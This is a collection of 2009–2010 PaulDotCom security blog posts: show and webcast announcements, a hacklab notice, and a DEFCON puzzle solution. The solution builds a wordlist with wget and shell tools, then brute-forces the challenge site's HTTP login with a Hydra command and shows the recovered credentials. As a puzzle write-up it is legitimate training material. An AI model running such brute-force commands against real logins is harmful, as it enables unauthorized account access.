We'll chat with Belgium Security Blogger Didier Stevens about Google adwords, pdf readers, twitter controlled Christmas trees and his unhealthy obsession with RFID tags. Watch us live at 19:30 EST, Thursday January 14th for Episode 183 of PaulDotCom Security Weekly.

Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

PaulDotCom Livestream - All new with Video and Chat! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/

PaulDotCom Icecast Radio

Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!

- John, Darren, Mick, Carlos, Paul, & Larry

PaulDotCom is very excited to bring you several new webcast series starting next January. The webcasts will be produced, hosted, and performed by the members of PaulDotCom. In addition to the White Hat World webcasts, there will be several different topic-based webcasts that will highlight different areas of information security. The first two are sure to be a "smash hit" as we show you how to improve your skills in the areas of client-side penetration testing and web application assessments (and even avenge the death of your master). Information about each webcast, including the registration links, is below:

Title: Practical Client-Side Exploitation Kung Fu

Description: In this webcast we will explore the tools & techniques needed to perform successful client-side exploitation. Practical methods for information gathering, target selection, and exploit delivery will be covered.

Date: Thursday, January 21, 2010

Time: 2:00 PM - 3:00 PM EST

Sponsor: Core Security Technologies

Register Here: https://www1.gotomeeting.com/register/171250512

Title: Practical Web Application Pen Testing Kung Fu

Description: In this session John & Paul will guide you to performing more successful web application penetration testing. You will learn how to balance automated tools with manual testing, strike vulnerabilities with the highest chance of exploitation, and more!

Date: Tuesday, January 26, 2010

Time: 2:00 PM - 3:00 PM EST

Sponsor: Cenzic

Register Here: https://www1.gotomeeting.com/register/290940024

One of the great eye opening moments for me in the past few years was learning that we are outnumbered. Not only does it appear that there is a non-stop wave of malware and evil sites that are constantly trying to infect our systems, but it seems like our user population is working against us as well by trying to click on every evil link or evil file that they come upon. Because of this it is very easy to feel like the plight of today’s security professional is a grim one. I often say that we are in one of the only professions I know of which is destined to fail. You will have a breach and there will be compromises; you will get called out. In light of this reality I still find that information security professionals are a fairly happy lot. The trade-off for having the cards stacked against us is in that we get to work in on of the coolest fields.

If you don't think so….please get out. There are other people who would love to have your job.

However, I have also realized recently that we are not alone. There is another group of professionals that we work with every day that can help us. Our Administrator brethren are an untapped resource for the information security community. We need to start cross-training with them if we want to stand a chance against the onslaught of attacks and malware that we face on a daily basis.

There are a number of different ways to go about this. There are commercial training options for your systems administrators that are short and to the point. I will be teaching one of these classes online and another in New Orleans in January. Please see the below links for more information.

564 online.

564 in New Orleans with Mechanical Bull and Beads.

However, beyond the commercial options there is something that we should be doing as well. I recommend having weekly brown bag meetings where you can show your systems administrators some cool tricks for ideating an incident and they can show you some neat tricks for understanding the business application process flow of your organization. This tradeoff is beneficial because it illuminates both aspects of an organization, security and day-to-day administration.

Keep in mind that one of the greatest instructors of evil, the great Bastard Operator From Hell, was a Systems Administrator. There is much we can learn from them.

-strandjs

Please tune in live to hear Moxie Marlinspike talk with the PDC crew about his research, specifically how he has poked SSL with a hot pointer until it cries uncle.

The podcast will be recorded t at 8:30 PM EDT on Friday, September 11, 2009. The live stream should be active around 20:45 EDT (8:45 PM Eastern). Please keep in mind that these times are estimates.

Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

Ustream: PaulDotCom UStream Channel

Icecast: PaulDotCom Radio

Please join us, enjoy the show live, and thanks for listening!

- John, Paul, Mick, Carlos & Larry

Please join us and Daniel Suarez, author of runaway hit Daemon Thursday night for Episode 165 of PaulDotCom Security Weekly. The live stream should be active around 18:45 EDT (6:45 PM), Thursday, August 27th. Please keep in mind that the recording time is an estimate.

Episode 165 will also feature a Tech Segment by John Strand, following up on his fabulous posting on 'Scanning through TOR'.

Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

Ustream: PaulDotCom UStream Channel

Icecast: PaulDotCom Radio

Please join us, enjoy the show live, and thanks for listening!

- John, Paul, Mick, Larry & Carlos.

All:

For your listening pleasure I have (finally!) edited the podcaster meetup audio. You can hear the likes of:

• PaulDotCom Security Weekly
• Security Justice
• Exotic Liability
• Securabit
• The Network Security Podcast
• SMB Minute
• GRM N00bs

At this meetup we took questions from the audience, performed strip teases, and did some general ranting.

Special guest appearance by none other than Twitchy!

Direct Audio Download

Audio Feeds:

Now that DEFCON 17 is over, we promised the solution to our party pass challenge. I knwoo that many have been waiting patiently, here it is:

Remember the original post? Here is the challenge in case you forgot.

As stated in the original post, everything that you needed to complete the challenge was in the posting. If you listen to our show, all of the tools you need to complete it were also discussed in previous episodes and technical segments! Of course, knowing our recent projects and humor makes it all that much easier.

Enter document metadata. Remember that nice badge picture?

Save it to disk and run exiftool on it as follows:

exiftool -r -a -u -g1 party_badge.jpg

exiftool party_badge.jpg

This command will give all sorts of information about the picture. A shortened version is shown below.

ExifTool Version Number         : 7.23
File Name                       : party_badge.jpg
File Size                       : 189 kB
File Modification Date/Time     : 2009:08:07 10:40:07
File Type                       : JPEG
MIME Type                       : image/jpeg
JFIF Version                    : 1.2
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : http://www.captainmetadata.com
Camera Model Name               : http://www.freelarrypesce.com
X Resolution                    : 100
Y Resolution                    : 100
User Comment                    : http://www.defconpartychallenge.com
Flashpix Version                : 0100
Color Space                     : Uncalibrated
GPS Version ID                  : 2.2.0.0
GPS Latitude                    : 413551403 deg 0' 0.00"
GPS Longitude                   : 413551403 deg 0' 0.00"
GPS Map Datum                   : 0413551403
Quality                         : 100%
Image Size                      : 553x465
GPS Position                    : 413551403 deg 0' 0.00", 413551403 deg 0' 0.00"

Well, look at that. Three websites! Let's take a look at them, one at a time.

http://www.defconpartychallenge.com: We are presented with a pop up requiring authentication via username and password. Hmmm. Let's move on for a bit.

http://www.freelarrypesce.com: A Clue!

Need a password? It is the unique number from Larry's RFID implant. There are multiple ways to obtain it, but here are a few suggestions.
   1. Find it mentioned somewhere.
   2. Ask someone other than the PDC crew if they know it.
   3. As a last result, ask to read Larry's RFID tag at DEFCON (EM4x05 series tag, and if asked, he'll let you)
   4. Re-read the blog post. 

Ok, those we can do! So, where to find the RFID tag unique number? Well, one option was to actually read Larry's tag. You could have asked someone if they knew it, such as Major Malfunction, who cloned Larry's tag on stage at Shmoocon. Then there was the "find it mentioned somewhere". The tag number was featured in TWO videos; once in the implant procedure, and the other from the Shmoocon cloning video.

Wow, that was hard. Downloading and watching all those videos. But, wait Larry, you told me everything I needed was in the blog post!

It was.

Look at the image again with exiftool. See these funny numbers?

GPS Version ID                  : 2.2.0.0
GPS Latitude                    : 413551403 deg 0' 0.00"
GPS Longitude                   : 413551403 deg 0' 0.00"
GPS Map Datum                   : 0413551403

Well, if you plug that location in to google maps, it is in the middle of an ocean somewhere. But what about the GPS map datum? A quick google search would reveal that that is a VERY odd datum type. In fact, so odd, that it isn't valid.

So, there is the password: 0413551403

Yes, the password is in the image metadata several times, but most of them without the leading zero! Yeah, I got lazy, and just started pumping the number in to various interesting fields, until one kept the leading zero...

On to our next clue.

http://www.captainmetadata.com/

Need a username? Like we told you, EVERYTHING you needed was in the blog post.

Hmm, I seem to remember those crafty PaulDotCom guys talking about creating custom username and password lists from web pages... Ok, so how do I do that? In Episode 129, we talked about creating a custom wordlist. If we concatenate all of the commands (for unix text processing and wget) and use the single blog entry as a source, we get:

wget -r -l 1 http://pauldotcom.com/2009/07/the-pauldotcomi-hacked-
defcon.html | grep -hr "" pauldotcom.com/ | tr '[:space:]' '\n' |
sort | uniq > wordlist.lst | egrep -v '('\,'|'\;'|'\}'|'\{'|'\<'|'\>'|'\:'|'\='|'\"'|'\/'|'\/'|'\['|'\]')' wordlist.lst | sort -u
 > wordlist.clean.lst

Ouch.

Note that we did not use john the ripper to add additional passwords to the list as we did in Episode 129. Technically it wouldn't hurt, but the word was already in the page, no additional words needed.

Now that we have a wordlist and a password, we can brute force the login with Hyrda, which we mentioned in the White Hat World's Best Of Network Penetration Testing Tools:

hydra -s 80 -L wordlist.clean.lst -p 0413551403 -t 36 defconpartychallenge.com http-head /index.html

Woohoo! We get results back!

Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-08-07 13:25:44
[DATA] 36 tasks, 1 servers, 2249 login tries (l:2249/p:1), ~62 tries per task
[DATA] attacking service http-head on port 80
[80][www] host: 66.203.130.200   login: strippers   password: 0413551403
[STATUS] attack finished for defconpartychallenge.com (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-08-07 13:25:52

See, I told you strippers were awesome. Now go log in to the website with your credentials, and retrieve the picture that pays.

Mmmm, BACON! Two varieties, beans and mints! YOU WIN!

I hope you all enjoyed the challenge, even if you weren't going to DEFCON, or didn't get to complete it. We know a lot of you want PaulDotCom baubles so we are attempting to run another batch of "party badges" that we can exchange for a modest fee (to cover materials and postage). Stay tuned!

- Larry "haxorthematrx" Pesce

PaulDotCom will be running a Hacklab in Boston at SANS Boston 2009 hosted by strandjs this Friday August 7th from 6:00PM till ???. "Hack Naked" T-shirts will be on sale for $10!

We will be at the:

Hyatt Regency Boston
One Avenue de Lafayette
Boston, Massachusetts, USA 02111
Telephone: 617 912 1234
Fax: 617 451 2198

The even will take place on the fourth floor. This event is open to the public, so come on down and hack some systems. Better yet, bring some cool systems to hack.

That and it is kind of my birthday.

-strandjs